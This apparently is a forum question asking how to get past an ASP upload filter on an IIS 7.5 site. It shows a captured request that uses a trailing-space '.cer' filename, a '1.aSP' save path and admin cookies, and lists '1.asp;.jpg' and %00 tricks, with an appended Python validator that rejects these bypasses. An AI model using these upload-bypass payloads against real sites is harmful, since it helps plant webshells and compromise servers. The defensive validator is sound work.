
Upload bypass question

Request captured with Burp:

POST /fun/upload/upload.asp HTTP/1.1
Host: www.xxxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.xxxx.com/fun/upload/index.asp?savePath=/upload/Link/&act=delnow&picPathName=/upload/Link/2018572320425.jpg&p_imgPic=pic&p_put=pic_put
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 7202
Cookie: ASPSESSIONIDSQRDDBDT=ODLHDPBANHEILAPPJEFOPCAP; admin%5Fuser=admin888; admin%5Fid=3
Connection: keep-alive
Upgrade-Insecure-Requests: 1

-----------------------------24464570528145
Content-Disposition: form-data; name="p_imgPic"

pic
-----------------------------24464570528145
Content-Disposition: form-data; name="p_putPic"

picPathFileName
-----------------------------24464570528145
Content-Disposition: form-data; name="file1"; filename="1.cer "
Content-Type: image/jpeg

‰xxxxxxxxxxxxxxxxxxxxxxxxxx内容xxxxxxxxxxxxxxx


-----------------------------24464570528145
Content-Disposition: form-data; name="savepath"

/upload/Link/1.aSP
-----------------------------24464570528145
Content-Disposition: form-data; name="Submit"

Ìá½»
-----------------------------24464570528145--



The server is IIS 7.5; %00 truncation just produces an error.


This is the source of the current upload page:


<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>无标题文档</title>
<style type="text/css">
<!--
body {
    margin-left: 0px;
    margin-top: 0px;
    margin-right: 0px;
    margin-bottom: 0px;
}
-->
</style>

<script language="javascript">
<!--
function picUrlchange()
{
    if(document.MyForm.file1.value!='')
    {
        parent.document.getElementById("pic").style.display="block";
        parent.document.getElementById("pic").src=document.MyForm.file1.value;
    }
}

function cheFor()
{
    if(document.MyForm.file1.value=="")
    {
        alert("请选择图片!");
        return false;
    }
    return true;
}
-->
</script>

</head>

<body>
<form method="post" name="MyForm" action="upload.asp" enctype="multipart/form-data" onsubmit="return cheFor();">
<table width="282" cellspacing="0" cellpadding="0" border="0">
<input name="p_imgPic" value="pic" type="hidden">
<input name="p_putPic" value="pic_put" type="hidden">
  <tbody><tr>
    <td width="85%"><input name="file1" onchange="picUrlchange()" type="file"></td>
    <input name="savepath" value="/admin/" type="hidden">
    <td width="15%"><input name="Submit" value="提交" type="submit"></td>
  </tr>

</tbody></table>
</form>


There is some check on the local file: for example, selecting 1.asp;.jpg for upload gives an error, and uploading 1.jpg;.gif also gives an error. My guess is that it checks the characters in the filename. How can this be broken through?
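For the defender's side of this request: the handler lets the client choose both the stored filename ("1.cer ") and the target path ("savepath=/upload/Link/1.aSP"), and trusts the multipart Content-Type. The validator below is an added example (not the site's upload.asp, and written in Python rather than classic ASP) showing how a server can normalize the name the way IIS and the Windows filesystem would and decide on the result; the allow-list, signatures and UPLOAD_ROOT are assumed values.

```python
import os
import re
import secrets

# Assumed allow-list of extensions the server will store; tune per deployment.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}
# Assumed leading-byte signatures for those types; the client's Content-Type header is never consulted.
SIGNATURES = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "gif": b"GIF8", "png": b"\x89PNG"}
# The server picks the directory itself; the client's "savepath" form field is ignored entirely.
UPLOAD_ROOT = "/upload/Link"


def normalize_filename(filename: str) -> str:
    """Reduce a client-supplied filename to the base name the filesystem would actually use.

    Windows/IIS silently drop trailing spaces and dots ('1.cer ' becomes '1.cer'), classic IIS
    reads ';' as an extension terminator, and a NUL byte can truncate the name further down the
    stack, so all of these are handled *before* the extension is examined.
    """
    if "\x00" in filename:
        raise ValueError("NUL byte in filename")
    # Discard any client-supplied directory component (both '/' and '\\' separators).
    base = re.split(r"[\\/]", filename)[-1]
    base = base.rstrip(" .")
    if ";" in base or not base:
        raise ValueError("rejected filename characters")
    return base


def validate_upload(filename: str, magic: bytes) -> str:
    """Return the server-chosen storage path for an acceptable upload, else raise ValueError."""
    base = normalize_filename(filename)
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension '.{ext}' not allowed")
    if not magic.startswith(SIGNATURES[ext]):
        raise ValueError("file content does not match its extension")
    # Store under a server-generated name so the original name never reaches the disk.
    return os.path.join(UPLOAD_ROOT, f"{secrets.token_hex(8)}.{ext}")


def is_accepted(filename: str, magic: bytes) -> bool:
    """Convenience wrapper: True if validate_upload would store the file."""
    try:
        validate_upload(filename, magic)
        return True
    except ValueError:
        return False
```

Fed the names from the captured request, the validator rejects "1.cer " (normalized extension .cer is not allowed), "1.asp;.jpg" and "1.jpg;.gif" (semicolon), and "/upload/Link/1.aSP" (extension .asp after lower-casing), while a real JPEG under any casing of .jpg is stored under a fresh server-generated name.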
